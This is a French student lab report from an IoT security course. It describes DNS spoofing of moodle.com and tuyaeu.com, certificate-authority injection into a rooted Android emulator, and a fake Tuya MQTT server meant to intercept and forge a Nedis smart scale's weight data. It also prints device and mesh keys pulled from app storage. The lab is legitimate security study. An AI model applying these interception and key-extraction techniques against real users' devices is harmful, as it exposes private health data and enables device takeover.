PORT = 8883

PAYLOAD_POIDS = {
"protocol": 4,
"t": int(time.time()),
"data": {
"dps": {
"1": 8050,
"2": True,
"3": "kg"
}
}
}
# =================================================

def encode_remaining_length(length):
out = bytearray()
while True:
byte = length % 128
length //= 128
if length > 0:
byte |= 0x80
out.append(byte)
if length == 0:
break
return out

def create_mqtt_packet(pkt_type, flags, payload):
header = bytes([(pkt_type << 4) | flags])
return header + encode_remaining_length(len(payload)) + payload

def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)

sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("0.0.0.0", PORT))
sock.listen(5)

print(f"[*] Serveur MQTT TLS prêt sur {PORT}")

while True:
client, addr = sock.accept()
print(f"\n[+] Connexion de {addr[0]}")

try:
conn = context.wrap_socket(client, server_side=True)
print("TLS OK")

while True:
header = conn.recv(1)
if not header:
break

pkt_type = header[0] >> 4

# Remaining length
multiplier = 1
remaining_len = 0
while True:
b = conn.recv(1)[0]
remaining_len += (b & 127) * multiplier
multiplier *= 128
if not (b & 128):
break

payload = b""
while len(payload) < remaining_len:
payload += conn.recv(remaining_len - len(payload))

# ================= HANDLERS =================

# CONNECT
if pkt_type == 1:
print(">>> CONNECT reçu")
conn.send(b"\x20\x02\x00\x00")
print("<<< CONNACK envoyé")

# SUBSCRIBE
elif pkt_type == 8:
msg_id = payload[0:2]
topic_len = struct.unpack("!H", payload[2:4])[0]
topic = payload[4:4+topic_len].decode(errors="ignore")

print(f">>> SUBSCRIBE : {topic}")

# SUBACK (QoS 1 accepté)
suback_payload = msg_id + b"\x01"
conn.send(create_mqtt_packet(9, 0x00, suback_payload))
print("<<< SUBACK OK")

# Mapping OUT -> IN
pub_topic = topic.replace("/out/", "/in/")
print(f"Publication sur : {pub_topic}")

time.sleep(0.5)

json_payload = json.dumps(PAYLOAD_POIDS)
topic_bytes = pub_topic.encode()

var_header = struct.pack("!H", len(topic_bytes)) + topic_bytes
packet_payload = var_header + json_payload.encode()

# PUBLISH QoS 1
packet = create_mqtt_packet(3, 0x02, packet_payload)
conn.send(packet)

print(f"Payload envoyé (NON chiffré)")

# PINGREQ
elif pkt_type == 12:
conn.send(b"\xd0\x00")

else:
print(f"Packet MQTT type {pkt_type} ignoré")

except Exception as e:
print(f"Erreur connexion : {e}")

finally:
try:
conn.close()
except:
pass

if __name__ == "__main__":
start_server()

</syntaxhighlight>

On cherche dans le fichier shared_prefs situé dans /data/data/com.nedis.smartlife sur la VM android une clé local qui permettrai de chiffrer le message pour que Nedis l'accepte.<syntaxhighlight lang="linux-config">
emulator64_x86_64_arm64:/data/data/com.nedis.smartlife/shared_prefs # grep -r "localKey"

./sig_mesh_storage.xml: <string name="sig_mesheu176237y8062605m7Ddzpr3a6d803edeb314f364c55d2caab540918">[{"appkey":"2FC5C9F42A44F9D243F960231C370DC6","code":"mebf11e37fc6632a9b44qg","endTime":0,"ivIndex":0,"key":"mebf11e37fc6632a9b44qg","localKey":"674d29fb978a1705","meshId":"mebf11e37fc6632a9b44qg","meshKey":"2FC5C9F42A44F9D243F960231C370DC6","meshkey":"2FC5C9F42A44F9D243F960231C370DC6","name":"D8FBEEA2F2B93F4B63EFD7DA83424BA9","netWorkkey":"D8FBEEA2F2B93F4B63EFD7DA83424BA9","password":"fa1667ca872e46d4","pv":"2.1","resptime":0,"share":false,"startTime":0,"tempShare":false}]</string>
</syntaxhighlight>Je vais apprendre plus tard que cette clé est une clé qui permet de sécuriser l'échange Bluetooth entre la balance et le téléphone lors de la première connexion. Mais avant de le savoir, j'ai tenté d'améliorer le faux serveur avec cette clé.<syntaxhighlight lang="linux-config">
#!/usr/bin/env python3
import socket
import ssl
import time
import json
import struct
import base64
import hashlib
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

# ================= CONFIG =================
CERT_FILE = "/etc/ssl/apache/ssl/tuya.crt"
KEY_FILE = "/etc/ssl/apache/ssl/tuya.key"
PORT = 8883

# LOCAL KEY 16 caractères
LOCAL_KEY = b"674d29fb978a1705"

# DPS balance (poids correct pour Nedis)
DPS_POIDS = {
"1": 8050, # 80.50 kg
"2": 1, # stable
"3": "kg"
}
# =========================================

# ---------- TUYA CRYPTO ----------
def tuya_encrypt(data: dict, local_key: bytes) -> str:
raw = json.dumps(data, separators=(',', ':')).encode()
cipher = AES.new(local_key, AES.MODE_ECB)
encrypted = cipher.encrypt(pad(raw, 16))
return base64.b64encode(encrypted).decode()

def tuya_sign(enc_data: str, ts: int, local_key: bytes) -> str:
s = f"data={enc_data}&t={ts}&key={local_key.decode()}"
return hashlib.md5(s.encode()).hexdigest()

def build_tuya_payload(dps: dict, device_id: str) -> dict:
ts = int(time.time())
enc = tuya_encrypt({
"devId": device_id,
"dps": dps
}, LOCAL_KEY)
sign = tuya_sign(enc, ts, LOCAL_KEY)
return {
"protocol": 4,
"t": ts,
"data": enc,
"sign": sign
}

def extract_device_id(topic: str) -> str:
return topic.split("/")[-1]

# ---------- MQTT UTILS ----------
def encode_remaining_length(length):
out = bytearray()
while True:
byte = length % 128
length //= 128
if length > 0:
byte |= 0x80
out.append(byte)
if length == 0:
break
return out

def create_mqtt_packet(pkt_type, flags, payload):
header = bytes([(pkt_type << 4) | flags])
return header + encode_remaining_length(len(payload)) + payload

# ---------- SERVER ----------
def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)

sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("0.0.0.0", PORT))
sock.listen(5)

print(f"[*] Serveur MQTT TLS Tuya prêt sur {PORT}")

published_topics = set()

while True:
client, addr = sock.accept()
print(f"\n[+] Connexion de {addr[0]}")

try:
conn = context.wrap_socket(client, server_side=True)
print("TLS OK")

while True:
header = conn.recv(1)
if not header:
break

pkt_type = header[0] >> 4

# Remaining length
multiplier = 1
remaining_len = 0
while True:
b = conn.recv(1)[0]
remaining_len += (b & 127) * multiplier
multiplier *= 128
if not (b & 128):
break

payload = b""
while len(payload) < remaining_len:
payload += conn.recv(remaining_len - len(payload))

# -------- HANDLERS --------
if pkt_type == 1: # CONNECT
print(">>> CONNECT")
conn.send(b"\x20\x02\x00\x00") # CONNACK OK

elif pkt_type == 8: # SUBSCRIBE
msg_id = payload[0:2]
topic_len = struct.unpack("!H", payload[2:4])[0]
topic = payload[4:4+topic_len].decode(errors="ignore")

print(f">>> SUBSCRIBE : {topic}")
conn.send(create_mqtt_packet(9, 0x00, msg_id + b"\x01")) # SUBACK QoS 1

# Publication automatique
device_id = extract_device_id(topic)
tuya_payload = build_tuya_payload(DPS_POIDS, device_id)
json_payload = json.dumps(tuya_payload)

topic_bytes = topic.encode()
var_header = struct.pack("!H", len(topic_bytes)) + topic_bytes
packet_payload = var_header + json_payload.encode()

# PUBLISH QoS 1
packet = create_mqtt_packet(3, 0x02, packet_payload)
time.sleep(0.5)
conn.send(packet)
print("POIDS TUYA CHIFFRÉ ENVOYÉ")

elif pkt_type == 4: # PUBACK
print("<<< PUBACK")

elif pkt_type == 10: # UNSUBSCRIBE
msg_id = payload[0:2]
conn.send(create_mqtt_packet(11, 0x00, msg_id))
print("<<< UNSUBACK")

elif pkt_type == 12: # PINGREQ
conn.send(b"\xd0\x00")

else:
print(f"MQTT type {pkt_type} ignoré")

except Exception as e:
print(f"Erreur : {e}")

finally:
try:
conn.close()
except:
pass

if __name__ == "__main__":
start_server()

</syntaxhighlight>Je pense que pour faire fonctionner cette méthode, il faut absolument que je trouve la clé qui crypte le message pour que Nedis l'accepte quand il le reçoit

J'ai donc cherché dans cette direction et j'ai découvert deux choses.

Premièrement, TinyTuya, une API Python pour les appareils intelligents Tuya (génial, Nedis utilise Tuya) WiFi utilisant une connexion directe au réseau local (LAN) ou le cloud (API TuyaCloud). TinyTuya permet entre autre de récupérer la fameuse clé.

Ensuite, j'ai découvert la plateforme IOT de Tuya qui permet, en connectant son application de téléphone sur le site, de jouer avec ses appareils Tuya pour une connexion avec Home Assisant ou encore ... TinyTuya !

Spoiler alerte: J'ai du changer d'application et cette application ne tape plus sur la même adresse. Elle tape sur XX-eu.lifeaiot.com il a donc fallu refaire une redirection vers notre serveur pour ces nouvelles adresses.

Spoiler alerte: j'ai la clé. Je parle plus de TinyTuya dans la prochaine partie car même avec cette clé, ce faux serveur ne marche pas. Je vais donc tenter d'autres pistes.

== TinyTuya ==
Dans cette partie, nous allons tenter de connecter notre balance à notre faux serveur en utilisant l'utilitaire TinyTuya. Le but est de récupérer le poids de l'utilisateur de la balance lorsqu'il se pèse.

Dans un premier temps il a fallu connecter l'appli à la platforme IOT de Tuya. L'application "Nedis Smartlife" de Nedis, qui utilise bien la même base que l'application Smartlife de Tuya (oui oui c'est le même nom…) ne veux pas se connecter à la plateforme pour une raison inexplicable (et au vu du nombre de forum qui parle du sujet, je ne suis pas le seul).

J'ai donc du connecter ma balance sur l'appli Smartlife qui a bien voulu se connecter à la plateforme.

Cela me permet de récupérer avec TinyTuya les périphériques

Et je vais maintenant tenter d'expliquer le fonctionnement de TinyTuya étape par étape…

Déjà pourquoi connecter l'application avec la plateforme IOT de Tuya --> Cela permet à l'appli de récupérer les appareils connectés de mon application, elle va générer un ID et une clé.

Et comment faire pour que TinyTuya est accès aux appareils --> grâce à la commande <code>python -m tinytuya wizard</code> qui va prendre l'ID et la clé pour récupérer les appareils.

Ensuite la commande suivante va permettre à TinyTuya de détecter nos appareils qui sont effectivement connecté à notre réseau :<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# python3 -m tinytuya devices
TinyTuya (Tuya device scanner) [1.17.4] Loaded devices.json - 1 devices: Device Listing [
{
"name": "P\u00e8se pas que des personnes",
"id": "84853100a4e57c162d4c",
"key": "V[z^Gr|qekh]9z_>",
"mac": "a4:e5:7c:16:2d:4c",
"uuid": "84853100a4e57c162d4c",
"sn": "10003702800241",
"category": "qt",
"product_name": "Personal Scale",
"product_id": "arjciqapuueq9cvt",
"biz_type": 18,
"model": "WIFIHS10WT",
"sub": false,
"icon": "https://images.tuyaeu.com/smart/icon/ay1513237774906SMBA3/1652104387fa2f735a389.png",
"mapping": {} } ]
</syntaxhighlight>Et la, magie, on obtient la clé de la balance, on va pouvoir enfin récupérer le poids de notre utilisateur grâce à ce code python qui écoute la balance:<syntaxhighlight lang="python">
import tinytuya

DEVICE_ID = '84853100a4e57c162d4c'
IP_ADDRESS = '172.16.10.105'
LOCAL_KEY = 'V[z^Gr|qekh]9z_>'

# Connexion à l'appareil
d = tinytuya.Device(DEVICE_ID, IP_ADDRESS, LOCAL_KEY)

d.set_version(3.3)

# Récupérer le statut
data = d.status()
print("Statut complet :", data)
</syntaxhighlight>Évidemment cela ne fonctionne pas. Et pourquoi ? Et bien si l'on regarde dans le bloc <code>python3 -m tinytuya devices TinyTuya</code> on observe que le champs mapping est vide. Ce champs est censé afficher toute les données que TinyTuya est censé pouvoir récupérer … et il est vide …

Soit je suis à l'origine de ce problème, soit TinyTuya ne permet de changer nous ampoules connecté en rouge si la balance affiche que notre objectif de poids est dépassé …

Affaire à suivre.

TODO : ne marche pas en local ? tenter d'enlever la redirection

SE5 IdO sécurité des objets 2025/2026 b1

2026-01-11T22:11:16Z

Vdetrez : /* TinyTuya */

[[Fichier:1107px-Titre page.png|sans_cadre|820x820px]]

= Serveur virtuel (17/09) =
Dans un premier temps, on vient créer un serveur virtuel sur <code>capbreton</code> avec la commande <code>xen-create-image --hostname=SE5.vdetrez --dhcp --dir=/usr/local/xen --size=10G --memory=2G --dist=daedalus --bridge=bridgeStudents</code>

Ensuite, sur capbreton dans le dossier <code>/etc/network/interfaces.d</code> on vient créer un fichier <code>g1_vdetrez</code> pour mettre en place une nouvelle interface dans le VLAN 410. <syntaxhighlight lang="linux-config">
auto Trunk.410
iface Trunk.410 inet manual
vlan-raw-device Trunk
up ip link set $IFACE up
down ip link set $IFACE down

auto g1_vdetrez
iface g1_vdetrez inet manual
bridge_ports Trunk.410
up ip link set $IFACE up
down ip link set $IFACE down

</syntaxhighlight>

On a maintenant accès à la machine SE5.vdetrez (en ayant évidemment fait l'erreur de mettre "." à la place de "-") et on vient y configurer nos adresses IPv4.

Mon adresse IPv4 routée est la <code>172.26.145.100</code> et mon IPv4 dans le VLAN 410 est <code>172.16.10.0</code> <syntaxhighlight lang="linux-config">
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
address 172.26.145.110
netmask 255.255.255.0
gateway 172.26.145.251
# post-up ethtool -K eth0 tx off

auto eth1
iface eth1 inet static
address 172.16.10.0/24
#
# The commented out line above will disable TCP checksumming which
# might resolve problems for some users. It is disabled by default
#

</syntaxhighlight>

On vérifie avec la commande <code>ip a</code><syntaxhighlight lang="linux-config">
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:41 brd ff:ff:ff:ff:ff:ff
inet 172.26.145.110/24 brd 172.26.145.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 2001:660:4401:6050:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 853sec preferred_lft 753sec
inet6 2a01:c916:2047:c850:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 2591853sec preferred_lft 604653sec
inet6 fe80::216:3eff:fe23:7441/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:42 brd ff:ff:ff:ff:ff:ff
inet 172.16.10.0/24 brd 172.16.10.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe23:7442/64 scope link
valid_lft forever preferred_lft forever

</syntaxhighlight>

Et on constate que notre serveur a accès à Internet avec la commande <code>ping 8.8.8.8</code>

= Point d'accès WiFi (29/09) =
Pour l'instant, nous mettons de côté ce point du TP car il n'est pas utile pour la suite.

= Sécurisation WiFi par WPA2-PSK =

Pour communiquer avec le routeur <code>Cisco</code>, on branche le port série en USB et on se connecte avec la commande <code>minicom -D /dev/ttyUSB0 -b 9600</code>. La première étape fut la création du SSID <code>SE5-SSID10</code>.<syntaxhighlight lang="linux-config">
dot11 ssid SE5-SSID10

vlan 410

authentication open

authentication key-management wpa version 2

wpa-psk ascii Cisco2025

exit
</syntaxhighlight>
Puis, on configure l'interface <code>Dot11Radio0</code><syntaxhighlight lang="linux-config">
interface dot11radio 0

encryption mode ciphers aes-ccm

ssid SE5-SSID10

station-role root

no shutdown
</syntaxhighlight>Après cela, on retourne sur notre serveur virtuel et on y implémente un serveur DHCP pour l'attribution des IP aux machines se connectant sur le routeur. On retrouve cette configuration dans <code>/etc/dhcp/dhcpd.conf</code><syntaxhighlight lang="linux-config">
# dhcpd.conf

option domain-name "plil.info";
option domain-name-servers ns.plil.info;

default-lease-time 600;
max-lease-time 7200;

ddns-update-style none;

authoritative;

subnet 172.16.10.0 netmask 255.255.255.0 {
range 172.16.10.100 172.16.10.200;
option domain-name-servers 172.16.10.1;
option routers 172.16.10.1;
default-lease-time 600;
max-lease-time 7200;
}
</syntaxhighlight>Puis, on implémente un serveur DNS minimal dans le fichier <code>/etc/bind/named.conf.options</code><syntaxhighlight lang="linux-config">
options {
directory "/var/cache/bind";

recursion yes;
allow-query {172.16.10.0/24; 127.0.0.1;};

forwarders {
8.8.8.8;
1.1.1.1;
};

dnssec-validation auto;

listen-on {127.0.0.1; 172.16.10.1;};
listen-on-v6 { none; };
};
</syntaxhighlight>Et enfin, on met en place une mascarade entre le VLAN 410 et le routeur du réseau des salles de projets pour donner l'accès à Internet.<syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

= Interception de flux (30/09) =

== Redirection par DNS ==
Pour cette partie, on va ajouter une zone primaire à notre serveur DNS avec le nom Internet du site que l'on veut rediriger vers notre machine.

Ici, ce sera le merveilleux <code>moodle.com</code>

D'abord, on modifie <code>/etc/bind/named.conf.local</code><syntaxhighlight lang="linux-config">
//
// Do any local configuration here
//

// Consider adding the 1918 zones here, if they are not used in your
// organization
//include "/etc/bind/zones.rfc1918";

zone "moodle.com" {
type master;
file "/etc/bind/db.moodle.com";
};
</syntaxhighlight>Puis, on crée la fameuse zone <code>db.moodle.com</code> dans le même répertoire <syntaxhighlight lang="linux-config">
$TTL 200
@ IN SOA ns.moodle.com. admin.moodle.com. (
5 ;
3600 ;
1800 ;
604800 ;
86400 ;
)
IN NS ns.moodle.com.
ns IN A 172.16.10.1
@ IN A 172.16.10.1
www IN CNAME ns
</syntaxhighlight>Pour vérifier si notre configuration est correcte, on exécute ces deux commandes :

<code>sudo named-checkconf</code>

<code>sudo named-checkzone moodle.com /etc/bind/db.moodle.com</code>

== Redirection réseau ==
Dans cette partie, on ajoute une règle <code>iptables</code> pour rediriger le flux TCP vers un port local, le <code>8080</code>.

<code>iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-ports 8080</code><syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
0 0 REDIRECT 6 -- eth0 * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 redir ports 8080

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

== Serveur apache sécurise (04/10) ==

Dans un premier temps, on va créer un certificat auto-signé :

<code>openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/apache/apache-selfsigned.key -out /etc/ssl/apache/apache-selfsigned.crt -subj "/C=FR/ST=Nord/L=Lille/O=Popo/CN=moodle.com"</code>

Puis, on configure <code>Apache2</code>
<syntaxhighlight lang="linux-config">
GNU nano 7.2 /etc/apache2/sites-available/secure-site.conf
<VirtualHost *:443>
ServerName moodle.com

DocumentRoot /var/www/html

SSLEngine on
SSLCertificateFile /etc/ssl/apache/apache.crt
SSLCertificateKeyFile /etc/ssl/apache/apache.key

# Optionnel : log
ErrorLog ${APACHE_LOG_DIR}/ssl-error.log
CustomLog ${APACHE_LOG_DIR}/ssl-access.log combined
</VirtualHost>

# Redirection HTTP ^f^r HTTPS
<VirtualHost *:80>
ServerName moodle.com
Redirect permanent / https://moodle.com/
</VirtualHost>
</syntaxhighlight>

Maintenant, en prévision de la suite (voir explication dans Machine virtuelle Android), on va créer une autorité de certification nommée CertiFiable :

<code>openssl req -x509 -new -nodes -keyout ca.key -sha256 -days 365 -out ca.crt -subj "/CN=CertiFiable"</code>

Puis, on vient générer une demande de signature de certificat :

<code>openssl req -new -newkey rsa:2048 -nodes -keyout apache.key -out apache.csr -subj "/CN=moodle.com"</code>

Enfin, on vient signer le site avec le certificat de CertiFiable :

<code>openssl x509 -req -in apache.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out apache.crt -days 365 -sha256</code>

= Machine virtuelle <code>android</code> =

== Première tentative ==
Actuellement, si on navigue sur internet et que l'on se rend sur moodle.com, on atterrit bien sûr le faux Moodle, mais comme le téléphone ne connait pas l'autorité de certification nommé CertiFiable, on a le droit à ce magnifique message de connexion non sécurisée :

[[Fichier:Avertissement moodle.png|sans_cadre]][[Fichier:Moodle le magnifique.png|sans_cadre]]

Malheureusement, il est aujourd'hui impossible d'ajouter facilement une autorité de certification sur son téléphone.

C'est pour cela qu'une solution proposée est d'installer une machine virtuelle d'une ancienne version d'<code>Android</code> où il était possible d'en ajouter.

En ayant suivi ce tuto (https://help.clouding.io/hc/en-us/articles/4405454393756-How-to-virtualize-Android-with-QEMU-KVM), j'ai réussi à installer une VM sur Zabeth4 (j'ai dû prendre une autre iso car celle du site était inaccessible).

J'ai installé <code>VNC Viewer</code> pour pouvoir manipuler la machine virtuelle.

En étant sur la VM, j'ai pu me rendre compte qu'il n'était pas possible de se connecter au WiFi, c'est la connexion du pc qui est simulé comme un réseau WiFi dans la VM.

J'ai pu réfléchir à deux solutions avant que la VM ne crash d'elle-même et soit impossible à redémarrer...

La première est toute simple, connecter la Zabeth directement au WiFi, ce qui est difficile à distance. La seconde, qui est je pense possible, est de changer la carte réseau dans les fichiers de conf de la VM pour mettre celle supportant le WiFi.

Je n'ai donc pu tester aucune de ces deux solutions, la VM n'étant plus.

== Seconde tentative ==

Pour cette seconde tentative, j'utilise les commandes suivantes avec plusieurs ISO Android.<syntaxhighlight lang="linux-config">
qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw
qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw -cdrom *android-x86*.iso -boot d
qemu-system-x86_64 -m 2048 -enable-kvm -cpu host -smp 2 -display sdl -drive file=android.img,format=raw,if=virtio -usb -device usb-host,vendorid=0x148f,productid=0x5370
</syntaxhighlight>J'ai pu donc pu faire face:

- À un ISO sans les services Google et sans navigateur ...

- Un trop ancien pour Nedis

- Un qui refuse l'installation d'APK

- Un trop récent pour l'installation de certificat.

- Un qui refuse de se laisser root

En fin de séance, je n'ai malheureusement pas de VM Android fonctionnelle.

== Ultime tentative (qui marche) ==
Cette fois ci j'utilise l'application Android Studio qui permet d'émuler des téléphones Android pour le débogage d'application. On va donc s'en servir pour créer un Android routé qui va recevoir notre certificat.

Dans un premier temps j'ai donc routé mon téléphone avec l'utilitaire Magisik en suivant ce tutoriel : https://www.youtube.com/watch?v=QzsNn3GhYYk&t=374s.

Puis je viens ajouter un module dans Magisk qui permet de recharger à chaque demarrage du téléphone le certificat en question.

Le certificat peut être ajouter dans le téléphone en utilisant la commande <code>adb push xyzxyzxyz.0</code> .

La manipulation est la suivante :<syntaxhighlight lang="linux-config">
adb shell
su
cd /data/adb/modules/
mkdir -p tuya_cert/system/etc/security/cacerts
echo "id=tuya_cert" > tuya_cert/module.prop echo "name=Tuya Certificate Injection" >> tuya_cert/module.prop echo "version=1.0" >> tuya_cert/module.prop echo "versionCode=1" >> tuya_cert/module.prop echo "author=Victo" >> tuya_cert/module.prop echo "description=Injecte le certificat Tuya dans le systeme" >> tuya_cert/module.prop
touch tuya_cert/auto_mount
cp /sdcard/Download/26e33623.0 /data/adb/modules/tuya_cert/system/etc/security/cacerts/
chmod 644 /data/adb/modules/tuya_cert/system/etc/security/cacerts/26e33623.0
chown root:root /data/adb/modules/tuya_cert/system/etc/security/cacerts/26e33623.0
reboot
</syntaxhighlight>On a donc maintenant une VM Android avec notre certificat. Il faut maintenant que le PC qui host cette VM soit connecté à notre borne WiFi pour pouvoir constater que notre site Moodle.com est bien redirigé et sécurisé.

= Machine <code>Android</code> (06/10) =
Pour cette dernière partie, j'ai retrouvé une tablette sous <code>Android 4.4 KitKat</code> qui permet d'ajouter des autorités de certification.

C'est donc ce que j'ai fait :

[[Fichier:Photo_certifiable.png|sans_cadre]]

Maintenant, on constate en se connectant sur moodle.com à partir de cette tablette que l'on est bien redirigé vers le faux site et qu'il est sécurisé avec le magnifique cadenas vert.

[[Fichier:Photo moodle.png|sans_cadre]]

(cette page web date du 06/10/25, elle n'est plus valable depuis le 10/10/25...)

= Nedis Wi-Fi Smart Personal Scales =

Dans ce second TP, nous allons jouer avec ce pèse personne de nedis.

Dans un premier temps, j'ai connecté la balance au réseau SE5-SSID10.

Puis j'ai remarqué que quand je tentais de me peser, la balance affichait err2.

Après une courte investigation, il s'agit d'une balance qui émet des signaux électriques pour analyser la composition corporelle donc si on se pèse avec des chaussures, cela pose problème.

Pour la suite du projet, on se pèsera avec les mains.

[[Fichier:Poid_sur_app_nedis.png|sans_cadre]]

== Redirection du poids vers notre serveur ==
Dans un premier temps, mon idée était de faire croire à la balance qu'elle communique effectivement avec son serveur pour pouvoir récupérer les informations sur la santé de l'utilisateur.

Ici on constate sur ces paquets la requête de la balance pour obtenir une IP, puis le moment ou elle l'obtient.

[[Fichier:WS connection balance.png|sans_cadre|858x858px]]

Je peux donc ping ma balance depuis mon pc (celui qui host ma VM android)

[[Fichier:PIng balance.png|sans_cadre]]

Maintenant je veux voir les messages de communication entre la balance, son serveur et l'application, pour ce faire je fais <code>tcpdump -i eth1 -n port 53</code> :<syntaxhighlight lang="linux-config">
14:46:51.115996 IP 172.16.10.105.49153 > 172.16.10.1.53: 13861+ A? m2.tuyaeu.com. (31)
14:46:51.125611 IP 172.16.10.1.53 > 172.16.10.105.49153: 13861 3/0/0 A 3.120.92.134, A 18.184.31.90, A 35.156.44.172 (79)
14:46:51.168250 IP 172.16.10.105.49153 > 172.16.10.1.53: 59035+ A? a3.tuyaeu.com. (31)
14:46:51.177967 IP 172.16.10.1.53 > 172.16.10.105.49153: 59035 3/0/0 A 18.198.62.99, A 18.158.227.228, A 3.67.116.46 (79)
14:46:51.703179 IP 172.16.10.102.57661 > 172.16.10.1.53: 30982+ AAAA? a1.tuyaeu.com. (31)
14:46:51.706085 IP 172.16.10.102.57662 > 172.16.10.1.53: 15654+ A? a1.tuyaeu.com. (31)
14:46:51.713159 IP 172.16.10.1.53 > 172.16.10.102.57661: 30982 3/0/0 AAAA 2a05:d014:afa:af02:262a:be09:e328:ff21, AAAA 2a05:d014:afa:af01:87dc:dc67:35a1:5bfe, AAAA 2a05:d014:afa:af00:1ee2:1f00:e061:e8bf (115)
14:46:51.715736 IP 172.16.10.1.53 > 172.16.10.102.57662: 15654 3/0/0 A 3.78.92.3, A 35.159.150.3, A 3.121.33.91 (79)

56 packets captured
56 packets received by filter
0 packets dropped by kernel
[4343449.827028] device eth1 left promiscuous mode

</syntaxhighlight>visiblement notre balance communique avec tuya via m2.tuyaeu.com et a3.tuyaeu.com. Par la suite on constate qu'elle communique avec une multitude de XY.tuyaeu.com.

Maintenant on refait une config similaire à moodle.com, une zone "tuyaeu.com" dans le fichier de conf de bind, un fichier db.tuyaeu.com et une page apache. Enfin on vient la signer avec notre autorité de certification.

<code>tcpdump -i eth1 -n port 53</code> :<syntaxhighlight lang="linux-config">

12:30:58.490060 IP 172.16.10.105.49153 > 172.16.10.1.53: 50294+ A? m2.tuyaeu.com. (31)
12:30:58.490174 IP 172.16.10.1.53 > 172.16.10.105.49153: 50294* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)
12:30:58.540041 IP 172.16.10.105.49153 > 172.16.10.1.53: 23785+ A? a3.tuyaeu.com. (31)
12:30:58.540132 IP 172.16.10.1.53 > 172.16.10.105.49153: 23785* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)

</syntaxhighlight>Maintenant on constate que quand la balance demande l'adresse du serveur xy.tuyaeu.com, notre DNS lui répond avec l'IP de notre serveur.

On va créer un faux serveur pour déchiffrer ce que nous dit la balance.<syntaxhighlight lang="linux-config">
root@SE5:/etc/apache2/sites-available# openssl s_server -accept 8886 -cert /etc/ssl/apache/ca.crt -key /etc/ssl/apache/ca.key -debug
Using default temp DH parameters
ACCEPT
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
